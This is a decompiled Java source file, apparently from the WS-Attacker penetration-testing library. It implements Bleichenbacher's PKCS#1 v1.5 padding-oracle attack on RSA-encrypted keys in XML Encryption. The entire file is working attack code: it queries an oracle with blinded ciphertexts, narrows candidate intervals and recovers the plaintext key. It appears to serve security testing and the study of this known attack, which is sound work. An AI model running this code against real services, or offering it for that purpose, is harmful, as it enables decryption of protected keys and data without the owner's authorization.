/*
 * Decompiled with CFR 0.152.
 */
package wsattacker.library.xmlencryptionattack.attackengine.attacker.pkcs1;

import java.math.BigInteger;
import java.security.interfaces.RSAPublicKey;
import java.util.ArrayList;
import org.apache.log4j.Logger;
import wsattacker.library.xmlencryptionattack.attackengine.CryptoAttackException;
import wsattacker.library.xmlencryptionattack.attackengine.Utility;
import wsattacker.library.xmlencryptionattack.attackengine.attackbase.CCAAttack;
import wsattacker.library.xmlencryptionattack.attackengine.attacker.pkcs1.AttackerUtility;
import wsattacker.library.xmlencryptionattack.attackengine.attacker.pkcs1.Interval;
import wsattacker.library.xmlencryptionattack.attackengine.oracle.base.AOracle;
import wsattacker.library.xmlencryptionattack.attackengine.oracle.base.request.PKCS1OracleRequest;
import wsattacker.library.xmlencryptionattack.attackengine.oracle.base.response.OracleResponse;
import wsattacker.library.xmlencryptionattack.util.XMLEncryptionConstants;

public class BleichenbacherAttacker
extends CCAAttack {
    private final byte[] encryptedKey;
    protected final RSAPublicKey publicKey;
    private BigInteger c0;
    private BigInteger s0;
    protected BigInteger si;
    private Interval[] m;
    protected final int blockSize;
    private final BigInteger bigB;
    private final boolean msgIsPKCS;
    private byte[] result;
    static Logger LOG = Logger.getLogger(BleichenbacherAttacker.class);

    public BleichenbacherAttacker(byte[] encryptedKey, AOracle pkcsOracle) throws CryptoAttackException {
        this(encryptedKey, pkcsOracle, true);
    }

    public BleichenbacherAttacker(byte[] encryptedKey, AOracle pkcsOracle, boolean msgPKCScofnorm) {
        this.m_CryptoTechnique = XMLEncryptionConstants.CryptoTechnique.ASYMMETRIC;
        this.encryptedKey = (byte[])encryptedKey.clone();
        this.publicKey = pkcsOracle.getPublicKey();
        this.m_Oracle = pkcsOracle;
        this.msgIsPKCS = msgPKCScofnorm;
        this.c0 = BigInteger.ZERO;
        this.si = BigInteger.ZERO;
        this.m = null;
        this.blockSize = this.publicKey.getModulus().bitLength() / 8;
        int tmp = this.publicKey.getModulus().bitLength();
        while (tmp % 8 != 0) {
            ++tmp;
        }
        tmp = (tmp / 8 - 2) * 8;
        this.bigB = BigInteger.valueOf(2L).pow(tmp);
        LOG.info((Object)("B computed: " + this.bigB.toString(16)));
        LOG.info((Object)("Blocksize: " + this.blockSize + " bytes"));
    }

    @Override
    public byte[] executeAttack() throws CryptoAttackException {
        int i = 0;
        boolean solutionFound = false;
        LOG.info((Object)"Step 1: Blinding");
        if (this.msgIsPKCS) {
            LOG.info((Object)"Step skipped --> Message is considered as PKCS compliant.");
            this.s0 = BigInteger.ONE;
            this.c0 = new BigInteger(1, this.encryptedKey);
            this.m = new Interval[]{new Interval(BigInteger.valueOf(2L).multiply(this.bigB), BigInteger.valueOf(3L).multiply(this.bigB).subtract(BigInteger.ONE))};
        } else {
            this.stepOne();
        }
        ++i;
        while (!solutionFound) {
            LOG.info((Object)"Step 2: Searching for PKCS conforming messages.");
            this.stepTwo(i);
            LOG.info((Object)"Step 3: Narrowing the set of soultions.");
            this.stepThree(i);
            LOG.info((Object)"Step 4: Computing the solution.");
            solutionFound = this.stepFour(i);
            ++i;
            LOG.info((Object)("// Total # of queries so far: " + this.m_Oracle.getNumberOfQueries()));
        }
        return this.result;
    }

    private void stepOne() throws CryptoAttackException {
        byte[] send;
        PKCS1OracleRequest request;
        OracleResponse response;
        BigInteger n = this.publicKey.getModulus();
        BigInteger ciphered = new BigInteger(1, this.encryptedKey);
        do {
            this.si = this.si.add(BigInteger.ONE);
        } while ((response = this.m_Oracle.queryOracle(request = new PKCS1OracleRequest(send = this.prepareMsg(ciphered, this.si)))).getResult() != OracleResponse.Result.VALID);
        this.c0 = new BigInteger(1, send);
        this.s0 = this.si;
        this.m = new Interval[]{new Interval(BigInteger.valueOf(2L).multiply(this.bigB), BigInteger.valueOf(3L).multiply(this.bigB).subtract(BigInteger.ONE))};
        LOG.info((Object)(" Found s0 : " + this.si));
    }

    private void stepTwo(int i) throws CryptoAttackException {
        BigInteger n = this.publicKey.getModulus();
        if (i == 1) {
            this.stepTwoA();
        } else if (i > 1 && this.m.length >= 2) {
            this.stepTwoB();
        } else if (this.m.length == 1) {
            this.stepTwoC();
        }
        LOG.info((Object)(" Found s" + i + ": " + this.si));
    }

    private void stepTwoA() throws CryptoAttackException {
        byte[] send;
        PKCS1OracleRequest request;
        OracleResponse response;
        BigInteger n = this.publicKey.getModulus();
        LOG.info((Object)"Step 2a: Starting the search");
        BigInteger[] tmp = n.divideAndRemainder(BigInteger.valueOf(3L).multiply(this.bigB));
        this.si = BigInteger.ZERO.compareTo(tmp[1]) != 0 ? tmp[0].add(BigInteger.ONE) : tmp[0];
        this.si = this.si.subtract(BigInteger.ONE);
        do {
            this.si = this.si.add(BigInteger.ONE);
        } while ((response = this.m_Oracle.queryOracle(request = new PKCS1OracleRequest(send = this.prepareMsg(this.c0, this.si)))).getResult() != OracleResponse.Result.VALID);
    }

    private void stepTwoB() throws CryptoAttackException {
        byte[] send;
        PKCS1OracleRequest request;
        OracleResponse response;
        LOG.info((Object)"Step 2b: Searching with more than one interval left");
        do {
            this.si = this.si.add(BigInteger.ONE);
        } while ((response = this.m_Oracle.queryOracle(request = new PKCS1OracleRequest(send = this.prepareMsg(this.c0, this.si)))).getResult() != OracleResponse.Result.VALID);
    }

    private void stepTwoC() throws CryptoAttackException {
        byte[] send;
        PKCS1OracleRequest request;
        OracleResponse response;
        BigInteger n = this.publicKey.getModulus();
        LOG.info((Object)"Step 2c: Searching with one interval left");
        BigInteger ri = this.si.multiply(this.m[0].upper);
        ri = ri.subtract(BigInteger.valueOf(2L).multiply(this.bigB));
        ri = ri.multiply(BigInteger.valueOf(2L));
        ri = ri.divide(n);
        BigInteger upperBound = this.step2cComputeUpperBound(ri, n, this.m[0].lower);
        BigInteger lowerBound = this.step2cComputeLowerBound(ri, n, this.m[0].upper);
        this.si = lowerBound.subtract(BigInteger.ONE);
        do {
            this.si = this.si.add(BigInteger.ONE);
            if (this.si.compareTo(upperBound) <= 0) continue;
            ri = ri.add(BigInteger.ONE);
            upperBound = this.step2cComputeUpperBound(ri, n, this.m[0].lower);
            this.si = lowerBound = this.step2cComputeLowerBound(ri, n, this.m[0].upper);
        } while ((response = this.m_Oracle.queryOracle(request = new PKCS1OracleRequest(send = this.prepareMsg(this.c0, this.si)))).getResult() != OracleResponse.Result.VALID);
    }

    private void stepThree(int i) {
        BigInteger n = this.publicKey.getModulus();
        ArrayList<Interval> ms = new ArrayList<Interval>(15);
        for (Interval interval : this.m) {
            BigInteger lowerBound;
            BigInteger upperBound = this.step3ComputeUpperBound(this.si, n, interval.upper);
            BigInteger r = lowerBound = this.step3ComputeLowerBound(this.si, n, interval.lower);
            while (r.compareTo(upperBound) < 1) {
                BigInteger max = BigInteger.valueOf(2L).multiply(this.bigB).add(r.multiply(n));
                BigInteger[] tmp = max.divideAndRemainder(this.si);
                max = BigInteger.ZERO.compareTo(tmp[1]) != 0 ? tmp[0].add(BigInteger.ONE) : tmp[0];
                BigInteger min = BigInteger.valueOf(3L).multiply(this.bigB);
                min = min.subtract(BigInteger.ONE);
                min = min.add(r.multiply(n));
                min = min.divide(this.si);
                if (interval.lower.compareTo(max) > 0) {
                    max = interval.lower;
                }
                if (interval.upper.compareTo(min) < 0) {
                    min = interval.upper;
                }
                if (max.compareTo(min) <= 0) {
                    ms.add(new Interval(max, min));
                }
                r = r.add(BigInteger.ONE);
            }
        }
        LOG.info((Object)(" # of intervals for M" + i + ": " + ms.size()));
        this.m = ms.toArray(new Interval[ms.size()]);
    }

    private boolean stepFour(int i) {
        boolean resultFound = false;
        if (this.m.length == 1 && this.m[0].lower.compareTo(this.m[0].upper) == 0) {
            BigInteger solution = this.s0.modInverse(this.publicKey.getModulus());
            solution = solution.multiply(this.m[0].upper).mod(this.publicKey.getModulus());
            this.result = solution.toByteArray();
            LOG.info((Object)("====> Solution found!\n" + Utility.bytesToHex(this.result)));
            resultFound = true;
        }
        return resultFound;
    }

    private BigInteger step3ComputeUpperBound(BigInteger s, BigInteger modulus, BigInteger upperIntervalBound) {
        BigInteger upperBound = upperIntervalBound.multiply(s);
        BigInteger[] tmp = (upperBound = upperBound.subtract(BigInteger.valueOf(2L).multiply(this.bigB))).divideAndRemainder(modulus);
        upperBound = BigInteger.ZERO.compareTo(tmp[1]) != 0 ? BigInteger.ONE.add(tmp[0]) : tmp[0];
        return upperBound;
    }

    private BigInteger step3ComputeLowerBound(BigInteger s, BigInteger modulus, BigInteger lowerIntervalBound) {
        BigInteger lowerBound = lowerIntervalBound.multiply(s);
        lowerBound = lowerBound.subtract(BigInteger.valueOf(3L).multiply(this.bigB));
        lowerBound = lowerBound.add(BigInteger.ONE);
        lowerBound = lowerBound.divide(modulus);
        return lowerBound;
    }

    private BigInteger step2cComputeLowerBound(BigInteger r, BigInteger modulus, BigInteger upperIntervalBound) {
        BigInteger lowerBound = BigInteger.valueOf(2L).multiply(this.bigB);
        lowerBound = lowerBound.add(r.multiply(modulus));
        lowerBound = lowerBound.divide(upperIntervalBound);
        return lowerBound;
    }

    private BigInteger step2cComputeUpperBound(BigInteger r, BigInteger modulus, BigInteger lowerIntervalBound) {
        BigInteger upperBound = BigInteger.valueOf(3L).multiply(this.bigB);
        upperBound = upperBound.add(r.multiply(modulus));
        upperBound = upperBound.divide(lowerIntervalBound);
        return upperBound;
    }

    protected byte[] prepareMsg(BigInteger originalMessage, BigInteger si) {
        if (this.m_Oracle.getNumberOfQueries() % 100L == 0L) {
            LOG.info((Object)("# of queries so far: " + this.m_Oracle.getNumberOfQueries()));
        }
        BigInteger tmp = si.modPow(this.publicKey.getPublicExponent(), this.publicKey.getModulus());
        tmp = originalMessage.multiply(tmp);
        tmp = tmp.mod(this.publicKey.getModulus());
        byte[] msg = AttackerUtility.correctSize(tmp.toByteArray(), this.blockSize, true);
        return msg;
    }
}

